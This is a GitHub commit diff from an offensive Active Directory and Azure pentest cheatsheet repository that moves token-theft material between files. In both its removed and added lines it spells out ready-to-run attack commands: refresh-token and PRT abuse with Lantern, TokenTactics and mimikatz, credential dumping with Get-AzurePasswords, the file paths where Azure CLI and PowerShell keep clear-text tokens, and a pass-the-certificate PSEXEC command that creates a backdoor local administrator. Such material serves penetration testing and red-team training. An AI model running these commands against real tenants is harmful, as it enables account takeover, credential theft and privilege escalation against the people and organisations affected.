Skip to content

Commit

Permalink
Tokens Locations and References
Browse files Browse the repository at this point in the history
  • Loading branch information
@swisskyrepo
swisskyrepo committed Dec 1, 2023
1 parent 880d6a1 commit b8bec59
Show file tree
Hide file tree
Showing 9 changed files with 144 additions and 232 deletions.
2 changes: 1 addition & 1 deletion docs/README.md
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
# InternalAllTheThings
# 📕 InternalAllTheThings

Active Directory and Internal Pentest Cheatsheets

Expand Down
210 changes: 1 addition & 209 deletions docs/cloud/azure/Cloud - Azure Pentest.md
View file
Original file line number Diff line number Diff line change
@@ -1,25 +1,3 @@
# Cloud - Azure

## Summary

* [Azure Recon Tools](#azure-recon-tools)
* [Enumeration](#enumeration)
* [Enumeration methodology](#enumeration-methodology)
* [Token from Managed Identity](#token-from-managed-identity)
* [Refresh Tokens](#refresh-token)
* [Stealing Tokens](#stealing-tokens)
* [Stealing tokens from az cli](#stealing-tokens-from-az-cli)
* [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell)
* [Pass The Certificate](#pass--the-certificate)
* [Pass The PRT](#pass-the-prt)
* [Deployment Template](#deployment-template)
* [Application Proxy](#application-proxy)
* [Azure AD](#azure-ad)
* [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
* [Convert GUID to SID](#convert-guid-to-sid)
* [Azure AD Connect](#azure-ad-connect)
* [References](#references)

## Azure Recon Tools

* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound
Expand Down Expand Up @@ -171,190 +149,4 @@
# Administrator
$ Create-Backdoor, Execute-Backdoor
```
* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
## Token from Managed Identity
### Refresh Tokens
* https://github.com/ConstantinT/Lantern
```powershell
Lantern.exe cookie --derivedkey <Key from Mimikatz> --context <Context from Mimikatz> --prt <PRT from Mimikatz>
Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename <Name> --outpfxfile <Some path>
Lantern.exe token --username <Username> --password <Password>
Lantern.exe token --refreshtoken <RefreshToken>
Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password )
```
* https://github.com/rvrsh3ll/TokenTactics
```powershell
Import-Module .\TokenTactics.psd1
CommandType Name Version Source
----------- ---- ------- ------
Function Clear-Token 0.0.1 TokenTactics
Function Dump-OWAMailboxViaMSGraphApi 0.0.1 TokenTactics
Function Forge-UserAgent 0.0.1 TokenTactics
Function Get-AzureToken 0.0.1 TokenTactics
Function Get-TenantID 0.0.1 TokenTactics
Function Open-OWAMailboxInBrowser 0.0.1 TokenTactics
Function Parse-JWTtoken 0.0.1 TokenTactics
Function RefreshTo-AzureCoreManagementToken 0.0.1 TokenTactics
Function RefreshTo-AzureManagementToken 0.0.1 TokenTactics
Function RefreshTo-DODMSGraphToken 0.0.1 TokenTactics
Function RefreshTo-GraphToken 0.0.1 TokenTactics
Function RefreshTo-MAMToken 0.0.1 TokenTactics
Function RefreshTo-MSGraphToken 0.0.1 TokenTactics
Function RefreshTo-MSManageToken 0.0.1 TokenTactics
Function RefreshTo-MSTeamsToken 0.0.1 TokenTactics
Function RefreshTo-O365SuiteUXToken 0.0.1 TokenTactics
Function RefreshTo-OfficeAppsToken 0.0.1 TokenTactics
Function RefreshTo-OfficeManagementToken 0.0.1 TokenTactics
Function RefreshTo-OutlookToken 0.0.1 TokenTactics
Function RefreshTo-SubstrateToken 0.0.1 TokenTactics
```
## Stealing Tokens
* Get-AzurePasswords
```powershell
Import-Module Microburst.psm1
Get-AzurePasswords
Get-AzurePasswords -Verbose | Out-GridView
```
### Stealing tokens from az cli
* az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\<username>\.Azure`
* azureProfile.json in the same directory contains information about subscriptions.
### Stealing tokens from az powershell
* Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\<username>\.Azure`
* It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json**
* Users can save tokens using `Save-AzContext`
## Pass The Certificate
```ps1
Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username –Verbose
Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert
# Require the PRT, TenantID, Context and DerivedKey
& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId <TENANT-ID> --prt <PRT> --userName <Username>@<TENANT NAME>.onmicrosoft.com --hexCtx <HEX-CONTEXT> --hexDerivedKey <HEX-DERIVED-KEY>
# PFX saved with the name <Username>@<TENANT NAME>.onmicrosoft.com.pfx and password AzureADCert
```

Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine

https://github.com/morRubin/AzureADJoinedMachinePTC

```ps1
Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
Main.py --usercert "admin.pfx" --certpass password --remoteip 10.10.10.10
python Main.py --usercert C:\Users\Username\Documents\username\<USERNAME>@<TENANT NAME>.onmicrosoft.com.pfx --
certpass AzureADCert --remoteip 10.10.10.10 --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add"
```


## Deployment Template

```powershell
PS Az> Get-AzResourceGroup
PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP
# Export
PS Az> Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <RESOURCE GROUP> -DeploymentName <DEPLOYMENT NAME>
cat <DEPLOYMENT NAME>.json # search for hardcoded password
cat <PATH TO .json FILE> | Select-String password
```

## Application Proxy

```powershell
# Enumerate application that have Proxy
PS C:\Tools> Get-AzureADApplication -All $true | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}}
PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"}
PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1
PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId <OBJECT-ID>
```

## Application Endpoint
```powershell
# Enumerate possible endpoints for applications starting/ending with PREFIX
PS C:\Tools> Get-AzureADServicePrincipal -All $true -Filter "startswith(displayName,'PREFIX')" | % {$_.ReplyUrls}
PS C:\Tools> Get-AzureADApplication -All $true -Filter "endswith(displayName,'PREFIX')" | Select-Object ReplyUrls,WwwHomePage,HomePage
```


## Azure AD

With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD.

1. Authenticate to your webmail portal (i.e. https://webmail.domain.com/)
2. Change your browser URL to: https://azure.microsoft.com/
3. Pick the account from the active sessions
4. Select Azure Active Directory and enjoy!

### Azure AD vs Active Directory

| Active Directory | Azure AD |
|---|---|
| LDAP | REST API'S |
| NTLM/Kerberos | OAuth/SAML/OpenID |
| Structured directory (OU tree) | Flat structure |
| GPO | No GPO's |
| Super fine-tuned access controls | Predefined roles |
| Domain/forest | Tenant |
| Trusts | Guests |

* Password Hash Syncronization (PHS)
* Passwords from on-premise AD are sent to the cloud
* Use replication via a service account created by AD Connect
* Pass Through Authentication (PTA)
* Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text
* Connect Windows Server AD to Azure AD using Federation Server (ADFS)
* Dir-Sync : Handled by on-premise Windows Server AD, sync username/password


* Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large
* Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large
* Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large
* Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large


### Convert GUID to SID

The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id.

```powershell
GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
```

For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011`


## References

* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html)
* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/)
* [An introduction to penetration testing Azure - Akimbocore](https://akimbocore.com/article/introduction-to-pentesting-azure/)
* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)
* [Azure AD Overview](https://www.youtube.com/watch?v=l_pnNpdxj20)
* [Windows Azure Active Directory in plain English](https://www.youtube.com/watch?v=IcSATObaQZE)
* [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f)
* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
* [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/)
* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad)
* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud)
* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
23 changes: 22 additions & 1 deletion docs/cloud/azure/azure-access-and-token.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -199,6 +199,20 @@ Decode access tokens: [jwt.ms](https://jwt.ms/)
```
### Access Token Locations
Tokens are stored by default on the disk in you use **Azure Cloud Shell**. They canbe extracted by dumping the content of the storage account.
* az cli
* az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\<username>\.Azure`
* azureProfile.json in the same directory contains information about subscriptions.
* Az PowerShell
* Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\<username>\.Azure`
* It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json**
* Users can save tokens using `Save-AzContext`
## Refresh Token
* Requesting a token using credentials
Expand Down Expand Up @@ -282,6 +296,7 @@ MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joine
mimikatz # sekurlsa::cloudap
mimikatz # sekurlsa::dpapi
mimikatz # dpapi::cloudapkd /keyvalue:<key-value> /unprotect
mimikatz # dpapi::cloudapkd /context:<context> /derivedkey:<derived-key> /Prt:<prt>
```
* Use either roadtx or AADInternals to generate a new PRT token
```ps1
Expand Down Expand Up @@ -353,8 +368,14 @@ Use the user account to create a computer and request a PRT
## References
* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema - April 16, 2020](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
* [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0)
* [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program)
* [PRT Abuse from Userland with Cobalt Strike - 0xbad53c](https://red.0xbad53c.com/red-team-operations/azure-and-o365/prt-abuse-from-userland-with-cobalt-strike)
* [Pass-the-PRT attack and detection by Microsoft Defender for … - Derk van der Woude - Jun 9](https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94)
* [Journey to Azure AD PRT: Getting access with pass-the-token and pass-the-cert - AADInternals.com - September 01, 2020](https://aadinternals.com/post/prt/)
* [Journey to Azure AD PRT: Getting access with pass-the-token and pass-the-cert - AADInternals.com - September 01, 2020](https://aadinternals.com/post/prt/)
* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html)
* [Attacking Azure Cloud shell - Karl Fosaaen - December 10, 2019](https://blog.netspi.com/attacking-azure-cloud-shell/)
* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
26 changes: 23 additions & 3 deletions docs/cloud/azure/azure-ad-connect.md
View file
Original file line number Diff line number Diff line change
@@ -1,10 +1,25 @@
# Azure AD Connect

| Active Directory | Azure AD |
|-----------------------------------|-------------------|
| LDAP | REST API'S |
| NTLM/Kerberos | OAuth/SAML/OpenID |
| Structured directory (OU tree) | Flat structure |
| GPO | No GPO's |
| Super fine-tuned access controls | Predefined roles |
| Domain/forest | Tenant |
| Trusts | Guests |

Check if Azure AD Connect is installed : `Get-ADSyncConnector`

* For **PHS**, we can extract the credentials
* For **PTA**, we can install the agent
* For **Federation**, we can extract the certificate from ADFS server using DA
* Passwords from on-premise AD are sent to the cloud
* Use replication via a service account created by AD Connect
* For **PTA**, we can attack the agent
* Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text
* For **Federation**, connect Windows Server AD to Azure AD using Federation Server (ADFS)
* Dir-Sync : Handled by on-premise Windows Server AD, sync username/password
* extract the certificate from ADFS server using DA


## Password Hash Synchronization
Expand Down Expand Up @@ -100,4 +115,9 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
## References
* [Introduction to Microsoft Entra Connect V2 - Microsoft](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-azure-ad-connect-v2)
* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory - Dirk-jan Mollema - 1st apr. 2019](https://www.youtube.com/watch?v=JEIR5oGCwdg)
* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory - Dirk-jan Mollema - 1st apr. 2019](https://www.youtube.com/watch?v=JEIR5oGCwdg)
* [Impersonating Office 365 Users With Mimikatz - Michael Grafnetter - January 15, 2017](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
* [Azure AD Overview - John Savill's Technical Training - Oct 7, 2014](https://www.youtube.com/watch?v=l_pnNpdxj20)
* [Windows Azure Active Directory in plain English - Openness AtCEE - Jan 9, 2014](https://www.youtube.com/watch?v=IcSATObaQZE)
* [Azure AD connect for RedTeam - Adam Chester @xpnsec - 2019-02-18](https://blog.xpnsec.com/azuread-connect-for-redteam/)
* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud)
Loading

0 comments on commit b8bec59

Please sign in to comment.